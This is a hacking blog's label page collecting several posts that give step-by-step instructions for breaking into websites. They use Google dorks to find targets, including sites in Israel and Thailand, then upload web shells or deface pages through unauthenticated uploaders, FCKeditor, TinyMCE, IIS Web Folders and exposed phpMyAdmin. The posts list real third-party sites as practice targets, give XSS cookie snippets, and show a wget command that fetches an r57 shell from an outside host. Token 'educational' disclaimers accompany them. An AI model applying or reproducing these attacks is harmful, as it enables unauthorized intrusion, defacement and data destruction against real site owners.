Tampilkan postingan dengan label website hack. Tampilkan semua postingan
Tampilkan postingan dengan label website hack. Tampilkan semua postingan

Senin, 20 Juni 2016

Israel Private 0Day Shell Upload Exploits ASP|PHP

Israel Private 0Day Shell Upload Exploits ASP|PHP

Israel Private 0Day Shell Upload Exploits ASP|PHP: Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....
Israel Private 0Day Shell Upload Exploits ASP|PHP
1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork

# Exploit Upload 1 -|-
/admin/adminbanners.aspx

# Exploit Upload 2 -|- 
/admin/AdminPics.aspx

When you upload your asp or php shell just Check Code Source of the page you will see your url Shell example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp
Israel Private 0Day Shell Upload Exploits ASP|PHP
2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=

# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
#‎Exploit‬ -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php
Israel Private 0Day Shell Upload Exploits ASP|PHP
3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin
# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

So thats it guys we have seen  Israel Private 0Day Shell Upload Exploits ASP|PHP shre it :)
Read more

How to get XSS Pop Up on any Site | Javascript Injection

How to get XSS Pop Up on any Site | Javascript Injection: Hello guys! so today we are going to discuss about javascript injection :P. By you can get XSS Pop up on any site all you need to do is just paste some javascript vectors in console prompt of your browser. How to get XSS Pop Up on any Site | Javascript Injection

By this you can prank your friends just by pasting javascript on a popular sites like facebook in console and take screenshots and simple send it to your friend :P ok so here we start..How to get XSS Pop Up on any Site | Javascript Injection


How to get XSS Pop Up on any Site | Javascript Injection

Javascript Injection: Produce XSS Pop Up on any Site. Basically, its just for fun, but sometimes you can get cookies of vulnerable website by using Javascript injection, ok so lets start..

1). For Chrome open console by Ctrl+Shift+I and paste any of these javascript in console box and get pop up :)

2). Do the same for Firefox :) Ctrl+Shift+I :)

To Alert and Changing Title on Website by Javascript(XSS)

just enter the below javascript in console :)
Javascript: alert(document.title = "title name");

Message On website on alert Box

Just enter this script:
Javascript: alert("you message here");
use this script for more than one message
javascript: alert("First message"); alert("second message"); alert("Third message");



Getting Cookies By javascripts(XSS)

You can also get cookies by javascript(XSS).. just use below scripts :)
alert(document.cookie);
javascript:void(document.cookie="Cookie_name=Cookie_value");
javascript:void(document.cookie="username=user123"); alert(document.cookie);
javascript:void(document.cookie="username=user123"); void(document.cookie="password=pass123"); alert(document.cookie); 
What are you waiting for? Just go ahead and prank your friends :P
So thats it for now if you really enjoyed reading do share and don't forget to leave your feedback :)... 
Read more

Kamis, 22 Januari 2015

Chiangraientersoft HTML Injection Vulnerability





Hello Readers! today im gonna share a HTML Injection Vulnerability. This works most on Thailand web pages :). So lets start..

Chiangraientersoft HTML Injection Vulnerability:

1). Go to google and type any of the following dorks :-
inurl:Qread.php?id_ques=
inurl:webboard/Qread.php?id_ques=
Vulnerable at 'Qform.php' at Field Subject/Title
2). Pick any site!..and replace everything after yoursite.com/ with anyone of the following [Exploit] :
 /webboard/Qform.php
 /board/Qform.php
3). Just fill-up the forum and upload your deface page shell etc..
After your file is successfully uploaded, it would be listed at www.site.com/board/ or www.site.com/webboard/


Read more

Sabtu, 19 April 2014

Simple Upload 53 Shell Upload Vulnerability

This Vulnerability allows Hacker to upload Shell. Web Application vulnerability in"Simple Upload 53" PHP file allows an attacker to upload Backdoor shell code in your website.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Paste the below dork in the google and click search.
inurl:simple-upload-53.php
2). After you search in Google you will find many Websites containing Simple-Upload-53.php at the end of url. Now simply open any of them.



3). Now you can see the upload option in the site. Here is the vulnerability, it allows you to upload files.
You can upload Backdoor shell as ".php.jpg" or ".php.gif" etc.

4). The uploaded shell will be in this place:
http://www.site.com/files/[Your File]
After uploading the shell , You can hack/deface the site.
Read more

WebTester File Upload Vulnerability



Hello Reader,Hope you all are enjoying my posts.. here Im back with new file upload vulnerability..
called WebTester File Upload Vulnerability . SO lets start..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). GO to google and type the following dork..
Google Dork : inurl:go.php?testID= 
For More Results Use your Brain and create your own Dork..
Exploit :http://[target]/[path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
2). Now, upload your html , txt or jpg files



3). To find you uploaded file :-
 http://target/path/test-images/[yourfile].html
Enjoy...
Read more

Hack Web Sites Using IIS Exploit [For XP Users]


Hello Readers, I heard some of you are not getting out tutorials because u have no knowledge about Web hacking and you wanna learn web hacking .. So today i decided to write this tutorial for no0bs.

Because in this tutorial we are going to learn about IIS Web Hacking Exploit the Easiest way to hack for Noobs..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

By using this Exploit an attacker can upload shell , Deface web site delete data etc. etc can do every thing without login..:D . Yeah you heard Right.. I know you all are getting exited, So lets's start :-

Note:- this is only for Windows XP users. For Windows 7 user , i will post soon ...

Follow the Instructions:-

1). First Of all we need to find Vulnerable site. Go to google and type the following dork:-

Dork- Intext:"Powered by IIS

Actually there is no particular dork be Creative use mind and create your own unique dork :) ..

If you are unable to find Don't worry ..See the end of the tutorial i have posted some sites :)

2). After Finding Vuln Site .Click on Start button And open "RUN"


3). Now type the following code in "RUN"
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

4). Now a FOlder will open named "Web Folders"

Now Right Click in that folder then "New" And then  "Web Folder"..


5). Now paste the url of the Vulnerable site And CLick Next..


6). Now it will ask you to give Name for that Web Folder leave as it is Click Finish..


7). Congratulations! Now you are in the web site..If you wanna upload shell copy your Shell.php in to that folder and your shell will be uploded.. to path

Example : site.com/shell.php

Do the same to upload your deface also :D

Here are some site For Practicing ....  
http://www.houtai123.cn/
http://news.rhvacnet.com/
http://israelshamir.net/
http://intellectual.members.easyspace.com/
http://hoodstarsports.com/
http://jennylo.co.uk/
http://hurrelvisualarts.com/

Soon i will post list of Vuln. sites of IIS Exploit/....
Read more

Selasa, 15 April 2014

Portail Dokeos deface and Shell Upload vulnerability

Portail Dokeos Vulnerability is a Kind of FCK Editor Remote file upload Vulnerability..
In this Vulnerability Hacker can upload a shell. deface page or any file on website without admin username and password...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Go to Google and enter the following dork
Google Dork :"Portail Dokeos 1.8.5"
2). Open any site and change the url after site.com to the Exploitable target..For Example:-

Exploit: http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

3). Now change ASP into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here..



To view your uploaded file go here : http://website/patch/main/upload/your file here 

Live Demo:-
http://www.kifofy.fr/kcours/main//inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ecampus.webinfo-concept.fr/main//inc/lib/fckeditor/editor/filemanager/upload/test.html

Read more

Encodable Shell File upload Vulnerablity

Yeah read it :) :P

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Open google.com and Enter the following dork
Dork: "intext:File Upload by Encodable"
Result comes with 166,000 results.. but some results are fake ... its may be malwares
So pick real things only , "Upload a file" You will this title in search results here :)
Click the sites only which comes with upload a file title..


2). After click the link you'll got a upload form...


3). You'll see some options in this form like name Description email etc ...
type anything in these boxes but add a email in email box, dont use your own
put this one billy@microsoft.com , admin@nasa.gov etc :P

4). Now choose you file and upload it :)

5). After clicking on upload button a pop up will be open ... dont close it, it will automatically closed
after uploading file.

6). In some sites you'll get your uploaded file link after uploading on website
and if you did not file it then try these url
/upload/files/
or /upload/userfiles/

Live Demo : http://www.bellblue.com/cgi-bin/filechucker.cgi

Read more

Minggu, 13 April 2014

Upload Shell And Deface Via PhpmyAdmin

Earlier I have posted About How to get Acess to PhpmyAdmin without login through google dorks. As i promised I will post about how to deface using PhpmyAdmin. So here it is Lets start...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements(All You Need):-
-You must have the full path 
- pma & mysql db privileges. 

Follow the Instructions:-
1). First login in to mysql. Or you can use these dorks also CLICK HERE.



2). Now click 'Show MySQL system varible" then 'SQL' . Now you can run sql commands,like create db, delete tables or whatever. We want to upload shell so lets move on to it. 



3). Now we will create a cmd line into a new file,with select into. SELECT "" INTO OUTFILE "full/path/here/cmd.php" and click 'Go'. 

4). Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell. wget http://www.r57.biz /r57.txt;mv r57.txt shell.php. Thats all then we av the shell on the site!!..!


Read more

Sabtu, 12 April 2014

PhpmyAdmin Exploit with Google Dorks




Hello Reader! Today Im going to show you how to exploit PHPmyAdmin with google Dorks. You dont nedd to do any thing no login nothing just put the dork and open any site you will directly go to PHPmyAdmin :).. So let's Start...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-
1). Enter the following Dork in Google.
Dork: allinurl:index.php?db=information_schema
2). It will show you about 80,800 Results. So now you can guess how many Vuln  sites are there :D..Open any site you will redirect to PHPmyAdmin...:D

This dork bypasses the admin username and pass and takes You directly to information schema tables to get data and You can delete data

Learn To Deface VIA PhpmyAdmin:-
How to deface using PHPmyAdmin..

Hope you all are enjoying my blog posts...If you like our tutorials please leave valuable comments ...
Read more